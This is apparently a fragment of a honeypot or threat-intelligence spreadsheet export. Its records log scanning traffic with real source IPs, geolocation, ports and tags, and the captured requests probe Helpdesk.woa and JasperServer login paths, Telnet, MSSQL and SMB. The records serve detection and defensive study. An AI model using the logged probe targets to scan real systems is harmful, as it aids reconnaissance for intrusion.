    <d v="2025-04-25T23:10:15"/>
    <d v="2024-02-08T10:01:00"/>
    <d v="2025-04-25T23:10:15"/>
    <n v="294"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTP_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;10316&amp;&amp;8443&amp;&amp;16229&amp;&amp;NA&amp;&amp;33967&amp;&amp;39498"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="NA"/>
    <s v="New York"/>
    <s v="5128581"/>
    <s v="10123"/>
    <s v="40.7128"/>
    <s v="-74.006"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="ICG"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9b4:8c6b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="813"/>
    <x v="813"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T22:39:54"/>
    <d v="2025-04-25T22:39:54"/>
    <d v="2025-04-25T22:39:54"/>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c:e821"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="814"/>
    <x v="814"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T22:35:05"/>
    <d v="2025-04-01T21:08:07"/>
    <d v="2025-04-25T22:35:05"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehrān"/>
    <s v="6659608"/>
    <s v="NA"/>
    <s v="35.7219"/>
    <s v="51.3347"/>
    <s v="43754"/>
    <s v="Asiatech Data Transmission company"/>
    <s v="Asiatech Data Transmission company"/>
    <s v="business"/>
    <s v="Asiatech Data Transmission Co."/>
    <s v="2007-02-15"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4dee:68de"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="815"/>
    <x v="815"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T22:16:49"/>
    <d v="2024-11-26T23:54:09"/>
    <d v="2025-04-25T22:16:49"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai (Ekta Nagar)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.0533"/>
    <s v="72.9378"/>
    <s v="138296"/>
    <s v="Juweriyah Networks Private Limited"/>
    <s v="Juweriyah Networks Private Limited"/>
    <s v="business"/>
    <s v="Juweriyah Networks Private Limited"/>
    <s v="None"/>
    <s v="STARNET7"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.123.225.233,61121)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.123.225.233,50645)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:677b:e1e9"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="An incoming SMB connection from an unknown IP address suggests a potential vulnerability scan or brute-force attack attempt._x000a_The attacker may be trying to exploit a weakness in the system's file sharing capabilities._x000a_This activity could be a precursor to a more serious malware infection or data theft."/>
    <m/>
  </r>
  <r>
    <x v="816"/>
    <x v="816"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T22:13:59"/>
    <d v="2024-12-22T20:36:10"/>
    <d v="2025-04-25T22:13:59"/>
    <n v="118"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
